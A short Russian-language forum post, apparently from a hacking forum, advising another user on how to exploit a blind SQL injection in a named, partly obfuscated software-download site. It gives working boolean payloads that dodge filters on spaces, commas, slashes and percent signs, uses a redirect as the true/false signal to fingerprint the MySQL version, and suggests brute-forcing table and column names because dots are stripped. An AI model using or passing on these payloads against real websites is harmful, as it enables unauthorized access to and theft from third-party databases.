05.01.2012, 06:49
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от trololoman96
trololoman96 said:
obnovi-soft[antigoogle].ru/software'
Что то не получается раскрутить, если и избавляюсь от sql ошибки то остается друга без намека на иньект, либо происходит редирект.
Нельзя использовать пробел, запятую, слеш, процент, возможно что-то еще. Нашел такой вариант:
1) false. редирект есть. version() like '4%'
/desktop'and(version())like(0x3425)and'1
2) true. редиректа нет. version() like '5%'.
/desktop'and(version())like(0x3525)and'1
upd:
Точка вырезается, так что придется брутить имена таблиц и колонок
|
|
|